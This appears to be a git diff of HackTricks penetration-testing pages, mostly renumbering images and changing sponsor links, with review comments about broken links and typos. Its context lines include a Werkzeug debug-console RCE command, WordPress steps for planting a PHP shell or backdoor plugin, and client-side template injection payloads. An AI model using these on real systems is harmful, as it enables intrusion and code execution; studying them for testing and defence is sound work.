* [https://github.com/Cyber-Guy1/API-SecurityEmpire](https://github.com/Cyber-Guy1/API-SecurityEmpire)
-
+
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=web-api-pentesting) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=web-api-pentesting" %}
diff --git a/network-services-pentesting/pentesting-web/werkzeug.md b/network-services-pentesting/pentesting-web/werkzeug.md
index f9e003780..a97bc1bc2 100644
--- a/network-services-pentesting/pentesting-web/werkzeug.md
+++ b/network-services-pentesting/pentesting-web/werkzeug.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
@@ -28,7 +28,7 @@ If debug is active you could try to access to `/console` and gain RCE.
__import__('os').popen('whoami').read();
```
-![](<../../.gitbook/assets/image (114).png>)
+![](<../../.gitbook/assets/image (117).png>)
There is also several exploits on the internet like [this ](https://github.com/its-arun/Werkzeug-Debug-RCE)or one in metasploit.
@@ -183,7 +183,7 @@ This is because, In Werkzeug it's possible to send some **Unicode** characters a
* [**https://github.com/pallets/werkzeug/issues/2833**](https://github.com/pallets/werkzeug/issues/2833)
* [**https://mizu.re/post/twisty-python**](https://mizu.re/post/twisty-python)
-
+
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
diff --git a/network-services-pentesting/pentesting-web/wordpress.md b/network-services-pentesting/pentesting-web/wordpress.md
index 0e3cf74a1..7fcb30475 100644
--- a/network-services-pentesting/pentesting-web/wordpress.md
+++ b/network-services-pentesting/pentesting-web/wordpress.md
@@ -14,13 +14,13 @@ Other ways to support HackTricks:
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=wordpress) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=wordpress" %}
## Basic Information
@@ -76,15 +76,15 @@ curl https://victim.com/ | grep 'content="WordPress'
* `meta name`
-![](<../../.gitbook/assets/image (1108).png>)
+![](<../../.gitbook/assets/image (1111).png>)
* CSS link files
-![](<../../.gitbook/assets/image (530).png>)
+![](<../../.gitbook/assets/image (533).png>)
* JavaScript files
-![](<../../.gitbook/assets/image (521).png>)
+![](<../../.gitbook/assets/image (524).png>)
### Get Plugins
@@ -111,13 +111,13 @@ curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/supp
```
{% endcode %}
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=wordpress) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=wordpress" %}
## Active enumeration
@@ -194,7 +194,7 @@ The message _"Incorrect username or password"_ inside a 200 code response should
![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (4) (1).png>)
-![](<../../.gitbook/assets/image (718).png>)
+![](<../../.gitbook/assets/image (721).png>)
Using the correct credentials you can upload a file. In the response the path will appears ([https://gist.github.com/georgestephanis/5681982](https://gist.github.com/georgestephanis/5681982))
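Review bot: the first image in this hunk still references the long `image (107) (2) (2) ... (1).png` asset name, while the next line moves `image (718).png` to `image (721).png` and a later hunk in this file moves `image (107).png` to `image (110).png`. Please confirm the duplicated-suffix file was not renamed along with the numbered assets, otherwise this figure breaks silently. The trailing context sentence "In the response the path will appears" can be corrected to "will appear" in the same pass.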
@@ -230,7 +230,7 @@ Using the correct credentials you can upload a file. In the response the path wi
Also there is a **faster way** to brute-force credentials using **`system.multicall`** as you can try several credentials on the same request:
-
+
**Bypass 2FA**
@@ -269,7 +269,7 @@ Take a look to the use of **`system.multicall`** in the previous section to lear
```
-![](<../../.gitbook/assets/image (107).png>)
+![](<../../.gitbook/assets/image (110).png>)
### wp-cron.php DoS
@@ -285,7 +285,7 @@ Try to access _https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa
This is the response when it doesn't work:
-![](<../../.gitbook/assets/image (362).png>)
+![](<../../.gitbook/assets/image (365).png>)
### SSRF
@@ -301,13 +301,13 @@ wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.domain.com [--plugins-detec
#You can try to bruteforce the admin user using wpscan with "-U admin"
```
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=wordpress) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=wordpress" %}
## Get access by overwriting a bit
@@ -326,7 +326,7 @@ Appearance → Theme Editor → 404 Template (at the right)
Change the content for a php shell:
-![](<../../.gitbook/assets/image (381).png>)
+![](<../../.gitbook/assets/image (384).png>)
Search in internet how can you access that updated page. In this case you have to access here: [http://10.11.1.234/wp-content/themes/twentytwelve/404.php](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
@@ -347,27 +347,27 @@ to get a session.
It may be possible to upload .php files as a plugin.\
Create your php backdoor using for example:
-![](<../../.gitbook/assets/image (180).png>)
+![](<../../.gitbook/assets/image (183).png>)
Then add a new plugin:
-![](<../../.gitbook/assets/image (719).png>)
+![](<../../.gitbook/assets/image (722).png>)
Upload plugin and press Install Now:
-![](<../../.gitbook/assets/image (246).png>)
+![](<../../.gitbook/assets/image (249).png>)
Click on Procced:
-![](<../../.gitbook/assets/image (67).png>)
+![](<../../.gitbook/assets/image (70).png>)
Probably this won't do anything apparently, but if you go to Media, you will see your shell uploaded:
-![](<../../.gitbook/assets/image (459).png>)
+![](<../../.gitbook/assets/image (462).png>)
Access it and you will see the URL to execute the reverse shell:
-![](<../../.gitbook/assets/image (1003).png>)
+![](<../../.gitbook/assets/image (1006).png>)
### Uploading and activating malicious plugin
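Review bot: all six image references renumbered in this hunk keep an empty alt text (`![](<...>)`), and several steps ("Create your php backdoor using for example:", "Then add a new plugin:") are carried only by the screenshot. Add a short alt text describing each step so the procedure stays readable if the asset numbering shifts again or an image fails to load. "Click on Procced:" in the context should read "Click on Proceed:".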
@@ -429,13 +429,13 @@ Also, **only install trustable WordPress plugins and themes**.
* **Limit login attempts** to prevent Brute Force attacks
* Rename **`wp-admin.php`** file and only allow access internally or from certain IP addresses.
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=wordpress) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=wordpress" %}
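Review bot: the hardening bullet kept as context at the top of this hunk tells readers to rename `wp-admin.php`, but WordPress core ships a `wp-login.php` file and a `wp-admin/` directory, not a `wp-admin.php`. Since this part of the page is being touched, correct the name so the advice to restrict access by IP points at something that exists.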
diff --git a/pentesting-web/2fa-bypass.md b/pentesting-web/2fa-bypass.md
index a0a18e88a..a49dcbc70 100644
--- a/pentesting-web/2fa-bypass.md
+++ b/pentesting-web/2fa-bypass.md
@@ -16,7 +16,7 @@ Other ways to support HackTricks:
### [WhiteIntel](https://whiteintel.io)
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
@@ -26,7 +26,7 @@ You can check their website and try their engine for **free** at:
{% embed url="https://whiteintel.io" %}
----
+***
## **Enhanced Two-Factor Authentication Bypass Techniques**
@@ -145,10 +145,9 @@ Utilizing decoy requests to obfuscate brute force attempts or mislead rate limit
* [https://medium.com/@iSecMax/two-factor-authentication-security-testing-and-possible-bypasses-f65650412b35](https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/%22https:/medium.com/@iSecMax/two-factor-authentication-security-testing-and-possible-bypasses-f65650412b35%22/README.md)
* [https://azwi.medium.com/2-factor-authentication-bypass-3b2bbd907718](https://azwi.medium.com/2-factor-authentication-bypass-3b2bbd907718)
-
### [WhiteIntel](https://whiteintel.io)
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
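Review bot: the first reference left as context in this hunk has a broken link destination: the visible text is the medium.com article, but the target is `https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/%22https:/medium.com/...%22/README.md`, i.e. the real URL wrapped in `%22` and nested under a repository path. The hunk only removes a blank line below the references; please fix the destination to the medium.com URL while editing this block.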
@@ -157,7 +156,9 @@ Their primary goal of WhiteIntel is to combat account takeovers and ransomware a
You can check their website and try their engine for **free** at:
{% embed url="https://whiteintel.io" %}
+
P
+
Learn AWS hacking from zero to hero withhtARTE (HackTricks AWS Red Team Expert)!
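Review bot: the two added blank lines frame a line that contains only `P`, directly before the "Learn AWS hacking" banner. If that line is leftover markup rather than intended content, remove it instead of spacing it out. The banner text in the context also reads "withhtARTE", which is missing a space.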
diff --git a/pentesting-web/browser-extension-pentesting-methodology/README.md b/pentesting-web/browser-extension-pentesting-methodology/README.md
index 1d01f8ab1..1e89f4d80 100644
--- a/pentesting-web/browser-extension-pentesting-methodology/README.md
+++ b/pentesting-web/browser-extension-pentesting-methodology/README.md
@@ -22,7 +22,7 @@ Browser extensions are written in JavaScript and loaded by the browser in the ba
Extension layouts look best when visualised and consists of three components. Let’s look at each component in depth.
-
+
### **Content Scripts**
@@ -119,7 +119,7 @@ chrome.storage.local.get("message", result =>
});
```
-
+
A message is sent to the extension pages by the content script when this button is clicked, through the utilization of the [**runtime.sendMessage() API**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/runtime/sendMessage). This is due to the content script's limitation in direct access to APIs, with `storage` being among the few exceptions. For functionalities beyond these exceptions, messages are sent to extension pages which content scripts can communicate with.
@@ -288,7 +288,7 @@ Browser extensions can contain various kinds of pages:
* Pages that the extension will **load in a new tab**.
* **Option Pages**: This page displays on top of the extension when clicked. In the previous manifest In my case I was able to access this page in `chrome://extensions/?options=fadlhnelkbeojnebcbkacjilhnbjfjca` or clicking:
-
+
Note that these pages aren't persistent like background pages as they load dynamically content on necessity. Despite this, they share certain capabilities with the background page:
@@ -353,7 +353,7 @@ chrome-extension:///message.html
In public extensions the **extension-id is accesible**:
-
+
Although, if the `manifest.json` parameter **`use_dynamic_url`** is used, this **id can be dynamic**.
diff --git a/pentesting-web/browser-extension-pentesting-methodology/browext-clickjacking.md b/pentesting-web/browser-extension-pentesting-methodology/browext-clickjacking.md
index 2cefe7ec9..7b0b8a77e 100644
--- a/pentesting-web/browser-extension-pentesting-methodology/browext-clickjacking.md
+++ b/pentesting-web/browser-extension-pentesting-methodology/browext-clickjacking.md
@@ -97,7 +97,7 @@ button {
A [**blog post about a ClickJacking in metamask can be found here**](https://slowmist.medium.com/metamask-clickjacking-vulnerability-analysis-f3e7c22ff4d9). In this case, Metamask fixed the vulnerability by checking that the protocol used to access it was **`https:`** or **`http:`** (not **`chrome:`** for example):
-
+
**Another ClickJacking fixed** in the Metamask extension was that users were able to **Click to whitelist** when a page was suspicious of being phishing because of `“web_accessible_resources”: [“inpage.js”, “phishing.html”]`. As that page was vulnerable to Clickjacking, an attacker could abuse it showing something normal to make the victim click to whitelist it without noticing, and then going back to the phishing page which will be whitelisted.
diff --git a/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md b/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md
index 850078d5e..2b15cfaf6 100644
--- a/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md
+++ b/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md
@@ -24,7 +24,7 @@ The previous manifest declares that the extension requires the `storage` permiss
An extension will request the permissions indicated in its **`manifest.json`** file and After installing the extension, you can **always check its permissions in your browser**, as shown in this image:
-
+
You can find the [**complete list of permissions a Chromium Browser Extension can request here**](https://developer.chrome.com/docs/extensions/develop/concepts/declare-permissions#permissions) and a [**complete list for Firefox extensions here**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions#api\_permissions)**.**
diff --git a/pentesting-web/cache-deception/README.md b/pentesting-web/cache-deception/README.md
index 3ed128d6e..2a370d1d3 100644
--- a/pentesting-web/cache-deception/README.md
+++ b/pentesting-web/cache-deception/README.md
@@ -14,13 +14,13 @@ Other ways to support HackTricks:
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=cache-deception) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=cache-deception" %}
## The difference
@@ -169,13 +169,13 @@ Example usage: `wcvs -u example.com`
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=cache-deception) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=cache-deception" %}
@@ -253,13 +253,13 @@ Learn here about how to perform[ Cache Deceptions attacks abusing HTTP Request S
* [https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9](https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9)
* [https://www.linkedin.com/pulse/how-i-hacked-all-zendesk-sites-265000-site-one-line-abdalhfaz/](https://www.linkedin.com/pulse/how-i-hacked-all-zendesk-sites-265000-site-one-line-abdalhfaz/)
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=cache-deception) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=cache-deception" %}
diff --git a/pentesting-web/clickjacking.md b/pentesting-web/clickjacking.md
index f77bd6244..4631b8115 100644
--- a/pentesting-web/clickjacking.md
+++ b/pentesting-web/clickjacking.md
@@ -14,13 +14,13 @@ Other ways to support HackTricks:
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=clickjacking) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=clickjacking" %}
## What is Clickjacking
@@ -218,13 +218,13 @@ if (top !== self) {
* [**https://portswigger.net/web-security/clickjacking**](https://portswigger.net/web-security/clickjacking)
* [**https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking\_Defense\_Cheat\_Sheet.html**](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking\_Defense\_Cheat\_Sheet.html)
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=clickjacking) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=clickjacking" %}
diff --git a/pentesting-web/client-side-template-injection-csti.md b/pentesting-web/client-side-template-injection-csti.md
index 449478738..ee25d3176 100644
--- a/pentesting-web/client-side-template-injection-csti.md
+++ b/pentesting-web/client-side-template-injection-csti.md
@@ -1,4 +1,4 @@
-
+# Client Side Template Injection (CSTI)
@@ -9,14 +9,14 @@ Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-### [WhiteIntel](https://whiteintel.io)
+#### [WhiteIntel](https://whiteintel.io)
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
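Review bot: the Twitter link destination changes from `hacktricks_live` to `hacktricks\_live`, which adds a backslash escape inside a URL, while the Trickest links in this same patch go the other way and drop `\_` and `\&` from their destinations. Pick one convention for link targets; unescaped is safer, because not every renderer strips the backslash. The link text `@carlospolopm` also does not match the `hacktricks_live` handle it points to. The same change is repeated in the last hunk of this file.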
@@ -26,17 +26,17 @@ You can check their website and try their engine for **free** at:
{% embed url="https://whiteintel.io" %}
----
+***
-# Summary
+## Summary
It is like a [**Server Side Template Injection**](ssti-server-side-template-injection/) but in the **client**. The **SSTI** can allow you to **execute code** on the remote server, the **CSTI** could allow you to **execute arbitrary JavaScript** code in the victim's browser.
**Testing** for this vulnerability is very **similar** as in the case of **SSTI**, the interpreter expects **a template** and will execute it. For example, with a payload like `{{ 7-7 }}`, if the app is **vulnerable** you will see a `0`, and if not, you will see the original: `{{ 7-7 }}`
-# AngularJS
+## AngularJS
-AngularJS is a widely-used JavaScript framework that interacts with HTML through attributes known as directives, a notable one being **`ng-app`**. This directive allows AngularJS to process the HTML content, enabling the execution of JavaScript expressions inside double curly braces.
+AngularJS is a widely-used JavaScript framework that interacts with HTML through attributes known as directives, a notable one being **`ng-app`**. This directive allows AngularJS to process the HTML content, enabling the execution of JavaScript expressions inside double curly braces.
In scenarios where user input is dynamically inserted into the HTML body tagged with `ng-app`, it's possible to execute arbitrary JavaScript code. This can be achieved by leveraging the syntax of AngularJS within the input. Below are examples demonstrating how JavaScript code can be executed:
@@ -49,13 +49,13 @@ In scenarios where user input is dynamically inserted into the HTML body tagged
```
-You can find a very **basic online example** of the vulnerability in **AngularJS** in [http://jsfiddle.net/2zs2yv7o/](http://jsfiddle.net/2zs2yv7o/) and in **[Burp Suite Academy](https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-angularjs-expression)**
+You can find a very **basic online example** of the vulnerability in **AngularJS** in [http://jsfiddle.net/2zs2yv7o/](http://jsfiddle.net/2zs2yv7o/) and in [**Burp Suite Academy**](https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-angularjs-expression)
{% hint style="danger" %}
-[**Angular 1.6 removed the sandbox**](http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html#:\~:text=The%20Angular%20expression%20sandbox%20will,smaller%20and%20easier%20to%20maintain.\&text=Removing%20the%20expression%20sandbox%20does,surface%20of%20Angular%201%20applications.) so from this version a payload like `{{constructor.constructor('alert(1)')()}}` or `` should work.
+[**Angular 1.6 removed the sandbox**](http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html) so from this version a payload like `{{constructor.constructor('alert(1)')()}}` or `` should work.
{% endhint %}
-# VueJS
+## VueJS
You can find a **vulnerable Vue** implementation in [https://vue-client-side-template-injection-example.azu.now.sh/](https://vue-client-side-template-injection-example.azu.now.sh)\
Working payload: [`https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor(%27alert(%22foo%22)%27)()%7D%`](https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor\(%27alert\(%22foo%22\)%27\)\(\)%7D%7D)
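Review bot: on the added Angular 1.6 hint line, the second payload is an empty code span ("or `` should work"), so the sentence offers an alternative that is not there. Either restore the missing payload or drop the "or" clause; the hunk only shortens the blog URL and carries the gap forward. In the trailing context, the Vue "Working payload" link text ends in `%7D%` while its destination ends in `%7D%7D`, so the displayed URL is truncated.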
@@ -69,7 +69,7 @@ And the **source code** of the vulnerable example here: [https://github.com/azu/
A really good post on CSTI in VUE can be found in [https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)
-## **V3**
+### **V3**
```
{{_openBlock.constructor('alert(1)')()}}
@@ -77,7 +77,7 @@ A really good post on CSTI in VUE can be found in [https://portswigger.net/resea
Credit: [Gareth Heyes, Lewis Ardern & PwnFunction](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)
-## **V2**
+### **V2**
```
{{constructor.constructor('alert(1)')()}}
@@ -87,7 +87,7 @@ Credit: [Mario Heiderich](https://twitter.com/cure53berlin)
**Check more VUE payloads in** [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected)
-# Mavo
+## Mavo
Payload:
@@ -107,13 +107,13 @@ javascript:alert(1)%252f%252f..%252fcss-images
**More payloads in** [**https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations**](https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations)
-# **Brute-Force Detection List**
+## **Brute-Force Detection List**
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}
-### [WhiteIntel](https://whiteintel.io)
+#### [WhiteIntel](https://whiteintel.io)
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
@@ -132,9 +132,7 @@ Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
diff --git a/pentesting-web/command-injection.md b/pentesting-web/command-injection.md
index 524574672..62b055557 100644
--- a/pentesting-web/command-injection.md
+++ b/pentesting-web/command-injection.md
@@ -14,12 +14,12 @@ Other ways to support HackTricks:
-
+
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=command-injection) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=command-injection" %}
## What is command Injection?
@@ -171,10 +171,10 @@ Other ways to support HackTricks:
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=command-injection) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=command-injection" %}
diff --git a/pentesting-web/content-security-policy-csp-bypass/README.md b/pentesting-web/content-security-policy-csp-bypass/README.md
index c10f71e96..b64cc9aa0 100644
--- a/pentesting-web/content-security-policy-csp-bypass/README.md
+++ b/pentesting-web/content-security-policy-csp-bypass/README.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
@@ -693,7 +693,7 @@ Both methods exploit the nuances of CSP implementation and behavior in browsers,
Trick from [**here**](https://ctftime.org/writeup/29310).
-
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
@@ -839,7 +839,7 @@ pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp);
-
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
diff --git a/pentesting-web/cors-bypass.md b/pentesting-web/cors-bypass.md
index 90920b5ab..142336c37 100644
--- a/pentesting-web/cors-bypass.md
+++ b/pentesting-web/cors-bypass.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
{% embed url="https://websec.nl/" %}
@@ -208,7 +208,7 @@ Regex patterns typically concentrate on alphanumeric, dot (.), and hyphen (-) ch
**For more information and settings of this bypass check:** [**https://www.corben.io/advanced-cors-techniques/**](https://www.corben.io/advanced-cors-techniques/) **and** [**https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397**](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397)
